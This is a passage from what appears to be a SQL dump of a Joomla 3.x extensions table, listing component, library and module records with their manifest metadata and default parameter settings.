cat_desc_cat\":\"0\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"1\",\"num_links\":\"0\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"1\",\"orderby_pri\":\"order\",\"orderby_sec\":\"rdate\",\"order_date\":\"published\",\"show_pagination\":\"2\",\"show_pagination_results\":\"0\",\"show_featured\":\"show\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\",\"feed_show_readmore\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(23,0,'com_config','component','com_config','',1,1,0,1,'{\"name\":\"com_config\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONFIG_XML_DESCRIPTION\",\"group\":\"\"}','{\"filters\":{\"1\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"9\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}','','',0,'0000-00-00 00:00:00',0,0),(24,0,'com_redirect','component','com_redirect','',1,1,0,1,'{\"name\":\"com_redirect\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(25,0,'com_users','component','com_users','',1,1,0,1,'{\"name\":\"com_users\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_USERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"users\"}','{\"allowUserRegistration\":\"0\",\"new_usertype\":\"2\",\"guest_usergroup\":\"1\",\"sendpassword\":\"1\",\"useractivation\":\"1\",\"mail_to_admin\":\"0\",\"captcha\":\"\",\"frontend_userparams\":\"1\",\"site_language\":\"0\",\"change_login_name\":\"0\",\"reset_count\":\"10\",\"reset_time\":\"1\",\"minimum_length\":\"4\",\"minimum_integers\":\"0\",\"minimum_symbols\":\"0\",\"minimum_uppercase\":\"0\",\"save_history\":\"1\",\"history_limit\":5,\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(27,0,'com_finder','component','com_finder','',1,1,0,0,'{\"name\":\"com_finder\",\"type\":\"component\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"finder\"}','{\"show_description\":\"1\",\"description_length\":255,\"allow_empty_query\":\"0\",\"show_url\":\"1\",\"show_advanced\":\"1\",\"expand_advanced\":\"0\",\"show_date_filters\":\"0\",\"highlight_terms\":\"1\",\"opensearch_name\":\"\",\"opensearch_description\":\"\",\"batch_size\":\"50\",\"memory_table_limit\":30000,\"title_multiplier\":\"1.7\",\"text_multiplier\":\"0.7\",\"meta_multiplier\":\"1.2\",\"path_multiplier\":\"2.0\",\"misc_multiplier\":\"0.3\",\"stemmer\":\"snowball\"}','','',0,'0000-00-00 00:00:00',0,0),(28,0,'com_joomlaupdate','component','com_joomlaupdate','',1,1,0,1,'{\"name\":\"com_joomlaupdate\",\"type\":\"component\",\"creationDate\":\"February 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.6.2\",\"description\":\"COM_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(29,0,'com_tags','component','com_tags','',1,1,1,1,'{\"name\":\"com_tags\",\"type\":\"component\",\"creationDate\":\"December 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"COM_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{\"tag_layout\":\"_:default\",\"save_history\":\"1\",\"history_limit\":5,\"show_tag_title\":\"0\",\"tag_list_show_tag_image\":\"0\",\"tag_list_show_tag_description\":\"0\",\"tag_list_image\":\"\",\"show_tag_num_items\":\"0\",\"tag_list_orderby\":\"title\",\"tag_list_orderby_direction\":\"ASC\",\"show_headings\":\"0\",\"tag_list_show_date\":\"0\",\"tag_list_show_item_image\":\"0\",\"tag_list_show_item_description\":\"0\",\"tag_list_item_maximum_characters\":0,\"return_any_or_all\":\"1\",\"include_children\":\"0\",\"maximum\":200,\"tag_list_language_filter\":\"all\",\"tags_layout\":\"_:default\",\"all_tags_orderby\":\"title\",\"all_tags_orderby_direction\":\"ASC\",\"all_tags_show_tag_image\":\"0\",\"all_tags_show_tag_descripion\":\"0\",\"all_tags_tag_maximum_characters\":20,\"all_tags_show_tag_hits\":\"0\",\"filter_field\":\"1\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"tag_field_ajax_mode\":\"1\",\"show_feed_link\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(30,0,'com_contenthistory','component','com_contenthistory','',1,1,1,0,'{\"name\":\"com_contenthistory\",\"type\":\"component\",\"creationDate\":\"May 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_CONTENTHISTORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contenthistory\"}','','','',0,'0000-00-00 00:00:00',0,0),(31,0,'com_ajax','component','com_ajax','',1,1,1,1,'{\"name\":\"com_ajax\",\"type\":\"component\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_AJAX_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ajax\"}','','','',0,'0000-00-00 00:00:00',0,0),(32,0,'com_postinstall','component','com_postinstall','',1,1,1,1,'{\"name\":\"com_postinstall\",\"type\":\"component\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_POSTINSTALL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(33,0,'com_fields','component','com_fields','',1,1,1,0,'{\"name\":\"com_fields\",\"type\":\"component\",\"creationDate\":\"March 2016\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"COM_FIELDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fields\"}','','','',0,'0000-00-00 00:00:00',0,0),(34,0,'com_associations','component','com_associations','',1,1,1,0,'{\"name\":\"com_associations\",\"type\":\"component\",\"creationDate\":\"January 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.7.0\",\"description\":\"COM_ASSOCIATIONS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(35,0,'com_privacy','component','com_privacy','',1,1,1,1,'{\"name\":\"com_privacy\",\"type\":\"component\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_PRIVACY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"privacy\"}','','','',0,'0000-00-00 00:00:00',0,0),(36,0,'com_actionlogs','component','com_actionlogs','',1,1,1,1,'{\"name\":\"com_actionlogs\",\"type\":\"component\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"COM_ACTIONLOGS_XML_DESCRIPTION\",\"group\":\"\"}','{\"ip_logging\":0,\"csv_delimiter\":\",\",\"loggable_extensions\":[\"com_banners\",\"com_cache\",\"com_categories\",\"com_checkin\",\"com_config\",\"com_contact\",\"com_content\",\"com_installer\",\"com_media\",\"com_menus\",\"com_messages\",\"com_modules\",\"com_newsfeeds\",\"com_plugins\",\"com_redirect\",\"com_tags\",\"com_templates\",\"com_users\"]}','','',0,'0000-00-00 00:00:00',0,0),(102,0,'LIB_PHPUTF8','library','phputf8','',0,1,1,1,'{\"name\":\"LIB_PHPUTF8\",\"type\":\"library\",\"creationDate\":\"2006\",\"author\":\"Harry Fuecks\",\"copyright\":\"Copyright various authors\",\"authorEmail\":\"hfuecks@gmail.com\",\"authorUrl\":\"http:\\/\\/sourceforge.net\\/projects\\/phputf8\",\"version\":\"0.5\",\"description\":\"LIB_PHPUTF8_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phputf8\"}','','','',0,'0000-00-00 00:00:00',0,0),(103,0,'LIB_JOOMLA','library','joomla','',0,1,1,1,'{\"name\":\"LIB_JOOMLA\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"https:\\/\\/www.joomla.org\",\"version\":\"13.1\",\"description\":\"LIB_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{\"mediaversion\":\"e68165c617f7cdfcc6c8b9b06d7b8d75\"}','','',0,'0000-00-00 00:00:00',0,0),(104,0,'LIB_IDNA','library','idna_convert','',0,1,1,1,'{\"name\":\"LIB_IDNA\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"phlyLabs\",\"copyright\":\"2004-2011 phlyLabs Berlin, http:\\/\\/phlylabs.de\",\"authorEmail\":\"phlymail@phlylabs.de\",\"authorUrl\":\"http:\\/\\/phlylabs.de\",\"version\":\"0.8.0\",\"description\":\"LIB_IDNA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"idna_convert\"}','','','',0,'0000-00-00 00:00:00',0,0),(105,0,'FOF','library','fof','',0,1,1,1,'{\"name\":\"FOF\",\"type\":\"library\",\"creationDate\":\"2015-04-22 13:15:32\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2015 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.4.3\",\"description\":\"LIB_FOF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"fof\"}','','','',0,'0000-00-00 00:00:00',0,0),(106,0,'LIB_PHPASS','library','phpass','',0,1,1,1,'{\"name\":\"LIB_PHPASS\",\"type\":\"library\",\"creationDate\":\"2004-2006\",\"author\":\"Solar Designer\",\"copyright\":\"\",\"authorEmail\":\"solar@openwall.com\",\"authorUrl\":\"http:\\/\\/www.openwall.com\\/phpass\\/\",\"version\":\"0.3\",\"description\":\"LIB_PHPASS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phpass\"}','','','',0,'0000-00-00 00:00:00',0,0),(200,0,'mod_articles_archive','module','mod_articles_archive','',0,1,1,0,'{\"name\":\"mod_articles_archive\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_archive\"}','','','',0,'0000-00-00 00:00:00',0,0),(201,0,'mod_articles_latest','module','mod_articles_latest','',0,1,1,0,'{\"name\":\"mod_articles_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(202,0,'mod_articles_popular','module','mod_articles_popular','',0,1,1,0,'{\"name\":\"mod_articles_popular\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_popular\"}','','','',0,'0000-00-00 00:00:00',0,0),(203,0,'mod_banners','module','mod_banners','',0,1,1,0,'{\"name\":\"mod_banners\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_banners\"}','','','',0,'0000-00-00 00:00:00',0,0),(204,0,'mod_breadcrumbs','module','mod_breadcrumbs','',0,1,1,1,'{\"name\":\"mod_breadcrumbs\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BREADCRUMBS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_breadcrumbs\"}','','','',0,'0000-00-00 00:00:00',0,0),(205,0,'mod_custom','module','mod_custom','',0,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}','','','',0,'0000-00-00 00:00:00',0,0),(206,0,'mod_feed','module','mod_feed','',0,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}','','','',0,'0000-00-00 00:00:00',0,0),(207,0,'mod_footer','module','mod_footer','',0,1,1,0,'{\"name\":\"mod_footer\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FOOTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_footer\"}','','','',0,'0000-00-00 00:00:00',0,0),(208,0,'mod_login','module','mod_login','',0,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}','','','',0,'0000-00-00 00:00:00',0,0),(209,0,'mod_menu','module','mod_menu','',0,1,1,1,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(210,0,'mod_articles_news','module','mod_articles_news','',0,1,1,0,'{\"name\":\"mod_articles_news\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_news\"}','','','',0,'0000-00-00 00:00:00',0,0),(211,0,'mod_random_image','module','mod_random_image','',0,1,1,0,'{\"name\":\"mod_random_image\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RANDOM_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_random_image\"}','','','',0,'0000-00-00 00:00:00',0,0),(212,0,'mod_related_items','module','mod_related_items','',0,1,1,0,'{\"name\":\"mod_related_items\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RELATED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_related_items\"}','','','',0,'0000-00-00 00:00:00',0,0),(213,0,'mod_search','module','mod_search','',0,1,1,0,'{\"name\":\"mod_search\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_search\"}','','','',0,'0000-00-00 00:00:00',0,0),(214,0,'mod_stats','module','mod_stats','',0,1,1,0,'{\"name\":\"mod_stats\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats\"}','','','',0,'0000-00-00 00:00:00',0,0),(215,0,'mod_syndicate','module','mod_syndicate','',0,1,1,1,'{\"name\":\"mod_syndicate\",\"type\":\"module\",\"creationDate\":\"May 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SYNDICATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_syndicate\"}','','','',0,'0000-00-00 00:00:00',0,0),(216,0,'mod_users_latest','module','mod_users_latest','',0,1,1,0,'{\"name\":\"mod_users_latest\",\"type\":\"module\",\"creationDate\":\"December 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_USERS_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_users_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(218,0,'mod_whosonline','module','mod_whosonline','',0,1,1,0,'{\"name\":\"mod_whosonline\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WHOSONLINE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_whosonline\"}','','','',0,'0000-00-00 00:00:00',0,0),(219,0,'mod_wrapper','module','mod_wrapper','',0,1,1,0,'{\"name\":\"mod_wrapper\",\"type\":\"module\",\"creationDate\":\"October 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_wrapper\"}','','','',0,'0000-00-00 00:00:00',0,0),(220,0,'mod_articles_category','module','mod_articles_category','',0,1,1,0,'{\"name\":\"mod_articles_category\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_category\"}','','','',0,'0000-00-00 00:00:00',0,0),(221,0,'mod_articles_categories','module','mod_articles_categories','',0,1,1,0,'{\"name\":\"mod_articles_categories\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_categories\"}','','','',0,'0000-00-00 00:00:00',0,0),(222,0,'mod_languages','module','mod_languages','',0,1,1,1,'{\"name\":\"mod_languages\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"MOD_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_languages\"}','','','',0,'0000-00-00 00:00:00',0,0),(223,0,'mod_finder','module','mod_finder','',0,1,0,0,'{\"name\":\"mod_finder\",\"type\":\"module\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_finder\"}','','','',0,'0000-00-00 00:00:00',0,0),(300,0,'mod_custom','module','mod_custom','',1,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}','','','',0,'0000-00-00 00:00:00',0,0),(301,0,'mod_feed','module','mod_feed','',1,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}','','','',0,'0000-00-00 00:00:00',0,0),(302,0,'mod_latest','module','mod_latest','',1,1,1,0,'{\"name\":\"mod_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(303,0,'mod_logged','module','mod_logged','',1,1,1,0,'{\"name\":\"mod_logged\",\"type\":\"module\",\"creationDate\":\"January 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGGED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_logged\"}','','','',0,'0000-00-00 00:00:00',0,0),(304,0,'mod_login','module','mod_login','',1,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"March 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}','','','',0,'0000-00-00 00:00:00',0,0),(305,0,'mod_menu','module','mod_menu','',1,1,1,0,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(307,0,'mod_popular','module','mod_popular','',1,1,1,0,'{\"name\":\"mod_popular\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_popular\"}','','','',0,'0000-00-00 00:00:00',0,0),(308,0,'mod_quickicon','module','mod_quickicon','',1,1,1,1,'{\"name\":\"mod_quickicon\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2020 Open Source Matters. All rights 